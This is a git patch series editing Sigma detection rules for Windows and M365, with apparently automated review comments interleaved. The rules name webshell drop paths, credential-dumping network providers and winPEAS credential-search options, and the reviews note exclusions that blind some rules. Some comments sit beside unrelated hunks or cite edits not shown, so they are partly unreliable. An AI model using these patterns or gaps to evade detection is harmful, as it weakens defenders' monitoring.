.../registry_set_new_network_provider.yml | 5 ++++- 12 files changed, 60 insertions(+), 31 deletions(-) diff --git a/rules/windows/builtin/security/win_scm_database_privileged_operation.yml b/rules/windows/builtin/security/win_scm_database_privileged_operation.yml index ed9b84694..7141e95ce 100644 --- a/rules/windows/builtin/security/win_scm_database_privileged_operation.yml +++ b/rules/windows/builtin/security/win_scm_database_privileged_operation.yml @@ -6,7 +6,7 @@ author: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton references: - https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html date: 2019/08/15 -modified: 2022/06/30 +modified: 2022/09/18 logsource: product: windows service: security 
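Review bot: The detection strings change (`'RemCom_stdint'` becomes `'RemCom_stdin'` and so on) but the diffstat shows only these three lines touched, so the rule's `modified:` date is not bumped as the other rules in this series do. Dropping the trailing `t` makes each `|contains` strictly broader, so nothing previously matched is lost. The commit message's test observation is worth keeping as an inline comment on `RelativeTargetName|contains:` so nobody re-adds the suffix.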
@@ -22,7 +22,7 @@ detection: condition: selection and not filter falsepositives: - Unknown -level: high +level: medium tags: - attack.privilege_escalation - attack.t1548 diff --git a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml index eda1ef802..ba9948640 100755 --- a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml +++ b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml @@ -6,37 +6,34 @@ author: Beyu Denis, oscd.community, Tim Shelton references: - PT ESC rule and personal experience date: 2019/10/22 -modified: 2022/05/24 +modified: 2022/09/18 logsource: product: windows category: file_event detection: - selection_2: + selection_wwwroot: TargetFilename|contains: '\inetpub\wwwroot\' - selection_3: + selection_ext1: TargetFilename|contains: - '.asp' - '.ashx' - '.ph' - selection_4: + selection_static: TargetFilename|contains: - '\www\' - '\htdocs\' - '\html\' - selection_5: + selection_ext2: TargetFilename|contains: '.ph' - selection_6: - - TargetFilename|endswith: '.jsp' - - TargetFilename|contains|all: - - '\cgi-bin\' - - '.pl' false_positive1: # false positives when unpacking some executables in $TEMP TargetFilename|contains: - '\AppData\Local\Temp\' - '\Windows\Temp\' - false_positive2: + false_positive_system: Image: 'System' # fp : backup/restore from drivers - condition: not false_positive2 and ( (selection_2 and selection_3 and not false_positive1) or (selection_4 and selection_5 and not false_positive1) or (selection_6 and not false_positive1) ) + false_positive_legitimate: + TargetFilename|comntains: '\xampp' + condition: ((selection_wwwroot and selection_ext1) or (selection_static and selection_ext2)) and not 1 of false_positive* falsepositives: - Legitimate administrator or developer creating legitimate executable files in a web application folder level: high 
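Review bot: `false_positive_legitimate: TargetFilename|contains: '\xampp'` excludes every path containing `\xampp`, which includes `C:\xampp\htdocs\` — the very webroot that the `'\htdocs\'` entry of `selection_static` exists to cover — so a PHP file dropped into a XAMPP webroot no longer alerts at all. Scoping the exclusion to the install/extraction phase (an `Image` constraint on the installer, or paths under the XAMPP root but outside `\htdocs\`) would keep the FP fix without blinding the rule on the most common Windows PHP stack. Separately, `selection_6` (`.jsp`, and `\cgi-bin\` with `.pl`) is deleted here, which silently drops JSP and Perl webshell coverage; if that is intended, the description and commit message should say so.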
diff --git a/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml b/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml index 5eb617acc..d3a27df93 100644 --- a/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml +++ b/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml @@ -9,6 +9,7 @@ references: - Internal Research author: Nasreddine Bencherchali date: 2022/08/12 +modified: 2022/09/18 logsource: category: file_event product: windows @@ -17,7 +18,7 @@ detection: Image|endswith: - '\rundll32.exe' #- '\svchost.exe' # Might generate some FP - - '\dllhost.exe' + #- '\dllhost.exe' # Too many FPs - '\smss.exe' - '\RuntimeBroker.exe' - '\sihost.exe' diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml index dae3b3927..67657f150 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/08/22 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -20,7 +20,7 @@ detection: Image|contains: - '~1\' - '~2\' - filter: + filter1: - ParentImage: - C:\Windows\System32\Dism.exe - C:\Windows\System32\cleanmgr.exe # Spawns DismHost.exe with a shortened username (if too long) 
@@ -30,7 +30,14 @@ detection: - Product: 'InstallShield (R)' - Description: 'InstallShield (R) Setup Engine' - Company: 'InstallShield Software Corporation' - condition: selection and not filter + filter_installers: + - Image|contains|all: + - '\AppData\' + - '\Temp\' + - Image|endswith: + - '~1\unzip.exe' + - '~1\7zG.exe' + condition: selection and not 1 of filter* falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: high diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml index fceefa59e..4c53992f1 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/jonasLyk/status/1555914501802921984 date: 2022/08/06 -modified: 2022/08/12 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -37,9 +37,11 @@ detection: - '~2.js' - '~2.hta' filter: - ParentImage|endswith: + - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - '-installer.exe' # e.g. C:\Users\neo\Downloads\xampp-windows-x64-8.1.6-0-VS16-installer.exe + - Image|contains: '\vcredi' condition: selection and not filter falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml index a0305eede..b2d7e89af 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml 
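Review bot: The first entry of `filter_installers` (`Image|contains|all: '\AppData\'`, `'\Temp\'`) excludes any 8.3-notation image under a user's AppData temp directory, and because the filter is a list it applies on its own, not only together with the `~1\unzip.exe`/`~1\7zG.exe` names. User temp is a routine staging location for dropped payloads, so this switches a `level: high` rule off for exactly the images it is most useful against; constraining the entry with the parent installer (`ParentImage`) or a signed-product field, as `filter1` does with `Product`/`Company`, would keep the FP fix narrower. The head of `filter1` and the `selection` are outside the hunk.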
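Review bot: `'-installer.exe'` as a `ParentImage|endswith` entry excludes every parent whose name ends that way, which is a naming convention rather than a property of the XAMPP installer cited in the comment; likewise `Image|contains: '\vcredi'` matches any path containing that fragment. Turning `filter:` from a mapping into a list also changes it from AND to OR semantics, which is presumably intended but deserves a one-line comment. Pinning the installer entry to a vendor string (`Company`/`Product`) or to the download path would keep the exclusion tied to the observed FP.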
@@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://twitter.com/nas_bench/status/1535322445439180803 date: 2022/06/10 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -16,7 +17,11 @@ detection: filter: Image|endswith: '\explorer.exe' CommandLine|contains: '\Notepad++\notepad++.exe' - condition: selection and not filter + filter_parent: + ParentImage|contains: '\Notepad++\updater\' + filter_null: + CommandLine: null + condition: selection and not 1 of filter* falsepositives: - Other parent binaries using GUP not currently identified level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml index c86ba586d..7cb98a4f5 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml @@ -4,7 +4,7 @@ status: experimental description: Detects various anomalies in relation to regsvr32.exe author: Florian Roth, oscd.community, Tim Shelton date: 2019/01/16 -modified: 2022/07/20 +modified: 2022/09/18 references: - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -73,6 +73,8 @@ detection: filter2: ParentImage: 'C:\Program Files\Box\Box\FS\streem.exe' CommandLine|contains: '\Program Files\Box\Box\Temp\' + filter_legitimate: + CommandLine|contains: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll ' condition: 1 of selection* and not 1 of filter* fields: - CommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml index 831dc9d60..f2bea0cd7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml 
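Review bot: `filter_null: CommandLine: null` excludes every event that carries no command line, with no comment on why such events appear for GUP; the winevt rule later in this series documents its equivalent empty-`Image` filter as a known telemetry gap with a removal TODO, and the same treatment belongs here, e.g. `filter_null: # events without CommandLine from <telemetry source> - remove once the source populates the field`. `filter_parent` with `ParentImage|contains: '\Notepad++\updater\'` is a reasonable anchor on the legitimate updater location. The `selection` these are subtracted from is outside the hunk.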
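Review bot: `filter_legitimate: CommandLine|contains: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll '` ends in a space, so a command line that ends exactly at `RpcProxy.dll` does not match the filter and still alerts; if the trailing space is meant to pin a following argument, a comment should say so, otherwise drop it. Because this is a substring match on the command line rather than on the parent or the full command, it also excludes any regsvr32 invocation that merely includes this fragment; anchoring on `ParentImage` as `filter2` does would be tighter. The `selection*` groups are outside the hunk.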
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml @@ -10,7 +10,7 @@ tags: - attack.t1053.005 author: Florian Roth date: 2022/02/21 -modified: 2022/07/28 +modified: 2022/09/18 logsource: product: windows category: process_creation @@ -36,7 +36,9 @@ detection: - 'C:\Windows\Temp' - 'C:\Perflogs' filter_mixed: - - CommandLine|contains: 'update_task.xml' + - CommandLine|contains: + - 'update_task.xml' + - '/Create /TN TVInstallRestore /TR' - ParentCommandLine|contains: 'unattended.ini' condition: ( all of selection1* or all of selection2* ) and not 1 of filter* falsepositives: diff --git a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml index fc1844066..23cc3a56b 100644 --- a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml +++ b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml @@ -1,13 +1,13 @@ title: Atbroker Registry Change id: 9577edbb-851f-4243-8c91-1d5b50c1a39b -description: Detects creation/modification of Assisitive Technology applications and persistence with usage of ATs +description: Detects creation/modification of Assisitive Technology applications and persistence with usage of 'at' status: experimental author: Mateusz Wydra, oscd.community references: - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ date: 2020/10/13 -modified: 2021/05/24 +modified: 2022/09/18 tags: - attack.defense_evasion - attack.t1218 @@ -23,5 +23,5 @@ detection: - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration' condition: selection falsepositives: - - Creation of non-default, legitimate AT. -level: high + - Creation of non-default, legitimate at usage +level: medium 
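Review bot: `'/Create /TN TVInstallRestore /TR'` in `filter_mixed` excludes on a task name, which any schtasks invocation can reuse, so the exclusion is only as strong as the name. The neighbouring `ParentCommandLine|contains: 'unattended.ini'` entry shows the better pattern of anchoring on the installer context; if the task comes from a known installer (TV presumably TeamViewer — confirm), pairing the name with its `ParentImage` and noting the origin in a comment keeps the filter tied to the observed FP. The `selection1*`/`selection2*` groups are outside the hunk.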
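Review bot: The description edit changes `usage of ATs` to `usage of 'at'`, which now reads as the `at` scheduler rather than Assistive Technology, while the `Assisitive` typo on the same line is kept; the falsepositives line gets the same ambiguous wording. Suggest `description: Detects creation/modification of Assistive Technology (AT) applications and persistence through AT registration` and `- Creation of non-default, legitimate Assistive Technology (AT) entries`. The `detection` selection between the two hunks is outside them.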
diff --git a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml index cb1c122ea..069f95d0f 100644 --- a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml +++ b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml @@ -5,7 +5,7 @@ description: | A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. author: frack113 date: 2021/12/30 -modified: 2022/03/26 +modified: 2022/09/18 status: experimental references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md @@ -24,6 +24,13 @@ detection: User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' + filter_leg1: + TargetObject|contains: 'Control\Print\Monitors\MONVNC\Driver' + filter_leg2: + TargetObject|contains|all: + - 'Control\Print\Environments\'' + - '\Drivers\' + - '\VNC Printer' condition: selection and not 1 of filter_* falsepositives: - Unknown diff --git a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml index 5caf99e9d..72d5abdd5 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml @@ -7,6 +7,7 @@ references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ date: 2022/08/01 +modified: 2022/09/18 logsource: category: registry_set product: windows @@ -22,7 +23,9 @@ detection: - '\Enabled' - '\Start' Details: DWORD (0x00000000) - condition: all of selection* + filter_legitimate: + Image: 'C:\Windows\system32\wevtutil.exe' + condition: all of selection* and not 1 of filter* falsepositives: - Unknown level: high 
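Review bot: `filter_leg1` and `filter_leg2` key only on `TargetObject`, so any port-monitor or printer-driver registration that uses the `MONVNC` / `VNC Printer` key names is excluded regardless of which process wrote it. Adding an `Image` constraint (the VNC installer or service binary) or a `Details` constraint on the expected DLL would tie the exclusion to the real product, and a comment naming the VNC product observed would help future tuning. The `selection` and the rest of the `filter_` list are outside the hunk.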
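Review bot: `filter_legitimate: Image: 'C:\Windows\system32\wevtutil.exe'` whitelists the built-in tool that writes these `Enabled`/`Start` values when a channel is switched off, so the rule no longer fires on the manual wevtutil path at all — the exclusion removes coverage for that technique rather than tuning it. Scoping the filter by `ParentImage` (the deployment or test tooling that drove wevtutil), by `User`, or by the specific `TargetObject` session touched would keep the benign case out while leaving an interactive or script-launched wevtutil visible. The `selection*` groups are outside the hunk.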
diff --git a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml index 49a746ff1..b356a4de5 100644 --- a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml +++ b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml @@ -6,6 +6,7 @@ related: description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it author: Nasreddine Bencherchali date: 2022/08/23 +modified: 2022/09/18 status: experimental references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade @@ -25,7 +26,9 @@ detection: - '\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider' - '\System\CurrentControlSet\Services\RDPNP\NetworkProvider' #- '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV - condition: selection and not filter + filter_valid_procs: + Image: C:\Windows\System32\poqexec.exe + condition: selection and not 1 of filter* falsepositives: - Other legitimate network providers used and not filtred in this rule level: high From b052302ac04eeec0220a03ea7f399946c067aa56 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 16:24:07 +0200 Subject: [PATCH 57/96] fix: syntax error --- .../registry/registry_set/registry_set_add_port_monitor.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml index 069f95d0f..5b66ed84b 100644 --- a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml +++ b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml 
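Review bot: `Image: C:\Windows\System32\poqexec.exe` is the only unquoted path value in the rule; a plain scalar with backslashes is valid YAML, but the rest of this file single-quotes its paths, so `Image: 'C:\Windows\System32\poqexec.exe'` matches the convention. A short comment on when poqexec.exe touches `NetworkProvider` (presumably during servicing or in-place upgrade, which the rule's first reference covers — confirm) would explain the exclusion. The `selection` list is outside the hunk.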
@@ -28,7 +28,7 @@ detection: TargetObject|contains: 'Control\Print\Monitors\MONVNC\Driver' filter_leg2: TargetObject|contains|all: - - 'Control\Print\Environments\'' + - 'Control\Print\Environments\' - '\Drivers\' - '\VNC Printer' condition: selection and not 1 of filter_* From 6161fb91b311694fcf0dad7c3ec13938e92b122b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 18 Sep 2022 16:33:49 +0200 Subject: [PATCH 58/96] fix: typo in modifier --- .../file_event/file_event_win_webshell_creation_detect.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml index ba9948640..5d246108f 100755 --- a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml +++ b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml @@ -32,7 +32,7 @@ detection: false_positive_system: Image: 'System' # fp : backup/restore from drivers false_positive_legitimate: - TargetFilename|comntains: '\xampp' + TargetFilename|contains: '\xampp' condition: ((selection_wwwroot and selection_ext1) or (selection_static and selection_ext2)) and not 1 of false_positive* falsepositives: - Legitimate administrator or developer creating legitimate executable files in a web application folder From 2a94527714d4f7cbf7ceba6028fab3f3fa9cf55f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 19 Sep 2022 09:23:15 +0200 Subject: [PATCH 59/96] fix: FP with VBScript in registry key rule --- .../registry_set_vbs_payload_stored.yml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml index 049dc3869..935988c83 100644 --- a/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml 
+++ b/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml @@ -3,7 +3,7 @@ id: 46490193-1b22-4c29-bdd6-5bf63907216f description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group status: experimental date: 2021/03/05 -modified: 2022/03/26 +modified: 2022/09/19 author: Florian Roth references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ @@ -14,14 +14,13 @@ detection: selection: EventType: SetValue TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion' - Details|contains: - - 'vbscript' - - 'jscript' - - 'mshtml' + Details|contains: + - 'vbscript:' + - 'jscript:' + - 'mshtml,' - 'RunHTMLApplication' - 'Execute(' - 'CreateObject' - - 'RegRead' - 'window.close' filter: TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion\Run' @@ -31,8 +30,7 @@ detection: Details|contains: - '\Microsoft.NET\Primary Interop Assemblies\Microsoft.mshtml.dll' - '<\Microsoft.mshtml,fileVersion=' - - 'FL_Microsoft_mshtml_dll_____X86.' - - 'Microsoft_mshtml_dll_1_____X86.' + - '_mshtml_dll_' - '<\Microsoft.mshtml,culture=' condition: selection and not 1 of filter* falsepositives: From 633037e3ccc8dd4335f74872cffe20780c148b5c Mon Sep 17 00:00:00 2001 From: Feathers <93973834+ionsor@users.noreply.github.com> Date: Mon, 19 Sep 2022 13:19:55 +0200 Subject: [PATCH 60/96] Create microsoft365_pst_export_alert.yml (#2665) --- .../m365/microsoft365_pst_export_alert.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/m365/microsoft365_pst_export_alert.yml diff --git a/rules/cloud/m365/microsoft365_pst_export_alert.yml b/rules/cloud/m365/microsoft365_pst_export_alert.yml new file mode 100644 index 000000000..a9950ae28 --- /dev/null +++ b/rules/cloud/m365/microsoft365_pst_export_alert.yml 
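Review bot: The tightened `Details|contains` list drops `'RegRead'` and requires suffixes (`'vbscript:'`, `'jscript:'`, `'mshtml,'`), which narrows the rule without an inline rationale; the commit message only says "FP with VBScript in registry key rule". A comment such as `# suffixes required so plain product/path mentions of vbscript/jscript/mshtml do not match` on the list, plus a note on why `RegRead` is no longer needed (if it is part of the referenced Sibot behaviour, say why its removal is acceptable), would let a later reader judge the trade-off. The second hunk's `'_mshtml_dll_'` merge is a straightforward widening of the filter. The `selection` mapping starts outside the hunk.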
@@ -0,0 +1,23 @@ +title: PST Export Alert +id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 +status: experimental +description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content +author: 'Sorina Ionescu' +date: 2022/02/08 +references: + - https://attack.mitre.org/techniques/T1114/ +logsource: + service: threat_management + product: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: 'eDiscovery search started or exported' + status: success + condition: selection +falsepositives: + - PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored. +level: medium +tags: + - attack.collection + - attack.t1114 From a36724ffdf1baf74720fd66d3509db2ce4bf752d Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Mon, 19 Sep 2022 11:27:17 +0200 Subject: [PATCH 61/96] fix: FP found in testing environment --- .../registry_set/registry_set_disable_winevt_logging.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index 452485411..462cceb32 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -3,7 +3,7 @@ id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 description: Detects tempering with the "Enabled" registry key in order to disable windows logging of a windows event channel author: frack113, Nasreddine Bencherchali date: 2022/07/04 -modified: 2022/09/08 +modified: 2022/09/19 status: experimental references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 
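Review bot: The description `Alert on when a user has performed an eDiscovery search or exported a PST file from the search.` is a fragment; `description: Detects when a user has performed an eDiscovery search or exported a PST file from it. The PST file usually contains sensitive information, including email body content.` matches the phrasing of the other rules. `author: 'Sorina Ionescu'` is the only quoted metadata scalar, and the selection mixes bare (`SecurityComplianceCenter`) and quoted (`'eDiscovery search started or exported'`) values; pick one style. A one-line note that the event presumably originates from the built-in alert policy of the same name (confirm) would tell deployers what must be enabled for the rule to fire.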
@@ -27,6 +27,7 @@ detection: TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' + - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-AppCompat\' filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' From 52eae2c92b29eb121e7e59ecf9158d8d956cbb04 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 20:25:18 +0200 Subject: [PATCH 62/96] new rule for winpeas tool --- ...c_creation_detect_execution_of_winPEAS.yml | 57 +++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml diff --git a/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml b/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml new file mode 100644 index 000000000..5ef086252 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml 
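Review bot: The new `Microsoft-Windows-Kernel-AppCompat\` channel is added to the exclusion list without a comment on what disables it legitimately, while `filter_empty` right below documents its Aurora origin and a removal TODO. An inline `# <legitimate process/installer seen in testing> disables this channel - confirm before widening` on the new entry would keep the exclusion reviewable. The filter's header and the `selection` are outside the hunk.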
@@ -0,0 +1,57 @@ +title: Detect Execution of winPEAS +id: 98b53e78-ebaf-46f8-be06-421aafd176d9 +status: experimental +description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz +author: Georg Lauenstein +date: 2022/09/19 +references: + - https://github.com/carlospolop/PEASS-ng + - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation +tags: + - attack.privilege_escalation + - attack.t1082 + - attack.t1087 + - attack.t1046 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Image|endswith: + - '\winPEASany.exe' + - '\winPEASany_ofs.exe' + - '\winPEASx64.exe' + - '\winPEASx64_ofs.exe' + - '\winPEASx86.exe' + - '\winPEASx86_ofs.exe' + - OriginalFileName: + - 'winPEAS.exe' # always the same + selection_cmd_args: + - CommandLine|contains: + - 'domain' # Enumerate domain information + - 'systeminfo' # Search system information + - 'userinfo' # Search user information + - 'processinfo' # Search processes information + - 'serviceinfo' # Search services information + - 'applicationsinfo' # Search installed applications information + - 'networkinfo' # Search network information + - 'windowscreds' # Search windows credentials + - 'browserinfo ' # Search browser information + - 'filesinfo ' # Search generic files that can contains credentials + - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files + - 'eventsinfo' # Display interesting events information + filter_sysinfo: + - Image|endswith: + - '\systeminfo.exe' # due to option "systeminfo" via winPEAS + - OriginalFileName: + - 'sysinfo.exe' + condition: (selection_img or selection_cmd_args) and not filter_sysinfo +fields: + - Image + - User + - CommandLine + - ParentCommandLine + - CurrentDirectory +falsepositives: + - Pentesting +level: high From 44a49914190ed714da6685442af6c7b0baa92af6 Mon Sep 17 00:00:00 2001 
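Review bot: `selection_cmd_args` matches `CommandLine|contains` on bare words such as `'systeminfo'`, `'userinfo'`, `'processinfo'` and `'networkinfo'`, and the condition ORs it with the image match, so any process whose command line contains one of these fragments (including `systeminfo.exe` itself, which is why `filter_sysinfo` had to be added) trips a `level: high` rule; `'browserinfo '` and `'filesinfo '` also carry trailing spaces the other entries lack. Anchoring the option match on the image (`selection_img and selection_cmd_args`) or requiring several winPEAS-specific options together would make the command-line path usable. Separately, the tags pair `attack.privilege_escalation` with `t1082`, `t1087` and `t1046`, which are Discovery techniques; add `attack.discovery` (and the privilege-escalation technique actually meant, if any). Patches 63–68 reshape this file but keep both the bare substrings and this tag set.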
From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 21:00:59 +0200 Subject: [PATCH 63/96] Update and rename proc_creation_detect_execution_of_winPEAS.yml to proc_creation_win_winpeas_tool.yml --- ...cution_of_winPEAS.yml => proc_creation_win_winpeas_tool.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/windows/process_creation/{proc_creation_detect_execution_of_winPEAS.yml => proc_creation_win_winpeas_tool.yml} (98%) diff --git a/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml similarity index 98% rename from rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml rename to rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index 5ef086252..d093f55aa 100644 --- a/rules/windows/process_creation/proc_creation_detect_execution_of_winPEAS.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml @@ -1,4 +1,4 @@ -title: Detect Execution of winPEAS +title: Detect Execution of winPEAS id: 98b53e78-ebaf-46f8-be06-421aafd176d9 status: experimental description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz From d8e806cf93e82ce0dc5ea5e92e29089c68659d40 Mon Sep 17 00:00:00 2001 From: gs3cl <89155053+gs3cl@users.noreply.github.com> Date: Mon, 19 Sep 2022 21:17:32 +0200 Subject: [PATCH 64/96] Update falsepositives and format --- .../proc_creation_win_winpeas_tool.yml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml index d093f55aa..92378f6ca 100644 --- a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml +++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml 
